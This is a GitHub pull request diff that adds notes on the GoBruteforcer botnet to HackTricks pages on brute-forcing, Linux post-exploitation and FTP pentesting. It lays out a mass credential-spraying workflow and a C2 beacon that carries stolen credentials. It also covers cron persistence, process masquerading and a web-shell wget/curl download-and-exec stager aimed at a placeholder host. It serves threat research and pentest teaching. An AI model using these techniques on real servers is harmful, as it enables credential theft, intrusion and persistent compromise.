Skip to content

Inside GoBruteforcer AI-generated server defaults, weak pass... #1741

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
+34 βˆ’0
Open

Inside GoBruteforcer AI-generated server defaults, weak pass... #1741

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 12 additions & 0 deletions src/generic-hacking/brute-force.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -95,6 +95,14 @@ Finished in 0.920s.
- [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
- [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)

## Internet-wide bruteforcer workflow (lessons from Go-based scanners)

- Maintain **architecture-tuned worker pools** (for example, ~95 goroutines on `x86_64/arm64`, ~85 on `i686`, ~50 on low-end ARM) and respawn every second to keep **fixed concurrency**, with each worker handling exactly one target IP before exiting.
- Generate **random public IPv4s** but drop obvious honeypot-heavy or unroutable ranges: RFC1918, `100.64.0.0/10`, `127.0.0.0/8`, `0.0.0.0/8`, `169.254.0.0/16`, `198.18.0.0/15`, multicast `>=224.0.0.0/4`, cloud-heavy `/8`s (`3/15/16/56`) and DoD-associated `/8`s (`6/7/11/21/22/26/28/29/30/33/55/214/215`).
- **Probe the service port** with a short timeout (~2s) before attempting **cleartext logins** (FTP/21, MySQL/3306, Postgres/5432, phpMyAdmin over HTTP/80) and fall back to a **small builtin credential list** if the remote dictionary/C2 fetch fails.
- **Exfiltrate hits** via tiny HTTP GET beacons such as `http://<c2>:9090/pst?i=<ip>&c=<svc_code>&u=<user>&p=<pass>&e=<extra>` (service codes like `1=PMA`, `2=MySQL`, `3=FTP`, `4=Postgres`) while reusing a common browser User-Agent to blend in.
- **phpMyAdmin spray** can brute-force dozens of likely paths (~80+) with `GET /index.php?lang=en`, detect PMA markers (`pmahomme` theme/`phpmyadmin.css`/`navigation.php`) and parse `codemirror.css?v=X.Y.Z` to branch auth: versions `<4.9` accept GET params `pma_username`/`pma_password`; versions `>=4.9` require POST with `server=1`, CSRF `token`, and the same creds.

## Services

Ordered alphabetically by service name.
Expand Down Expand Up @@ -893,6 +901,10 @@ Cracking Common Application Hashes
1700 | SHA-512 | Raw Hash
```

## References

- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../banners/hacktricks-training.md}}


Expand Down
12 changes: 12 additions & 0 deletions src/linux-hardening/linux-post-exploitation/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -120,12 +120,24 @@ Hardening
- Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control
- Rotate leaked passwords discovered during tests

## Cron-based persistence with loopback mutex

- Copy implants into multiple writable paths (`/tmp`, `/var/tmp`, `/dev/shm`, `/run/lock`) and install cron entries such as `*/5 * * * * /tmp/<bin>` so they respawn even if removed elsewhere.
- Enforce **single-instance** execution by binding a fixed loopback port (for example, `127.0.0.1:51125` or `127.0.0.1:52225`) and exiting if `bind()` fails; `ss -lntp | grep -E '51125|52225'` will reveal the mutex listener.
- Operators may periodically mass-kill any process whose `cmdline` contains the dropper name (e.g., `init_stop`), so reusing those names during analysis can collide; pick unique filenames.

## Process masquerading via prctl + argv overwrite

- Set the short process name with `prctl(PR_SET_NAME, "<label>")` (15-byte `comm` limit), commonly to `init`, so `/proc/<pid>/status` and GUIs show a benign label.
- Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc/<pid>/cmdline` and `ps` also show the fake label.
- Hunt by comparing `Name:` in `/proc/<pid>/status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines.

## References

- [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
- [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../../banners/hacktricks-training.md}}
10 changes: 10 additions & 0 deletions src/network-services-pentesting/pentesting-ftp/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -146,6 +146,12 @@ If your user/password has special characters, the [following command](https://st
wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
```

### FTP root mapped to webroot (XAMPP)

- XAMPP/ProFTPD often maps FTP root to `/opt/lampp/htdocs`, so weak creds on service accounts like `daemon` or `nobody` let you **upload a PHP web shell directly into the served webroot**.
- After uploading, trigger an **architecture-aware download/exec stager** via the shell, for example: `webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86)`, which fetches a checksum-validated payload, saves it (e.g., `init_start`), sets `chmod +x`, and runs it.
- If the current directory is not writable/executable, the stager falls back to `/tmp`, so test web paths and filesystem permissions after upload.

## Some FTP commands

- **`USER username`**
Expand Down Expand Up @@ -279,4 +285,8 @@ Entry_7:
Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
```

## References

- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../../banners/hacktricks-training.md}}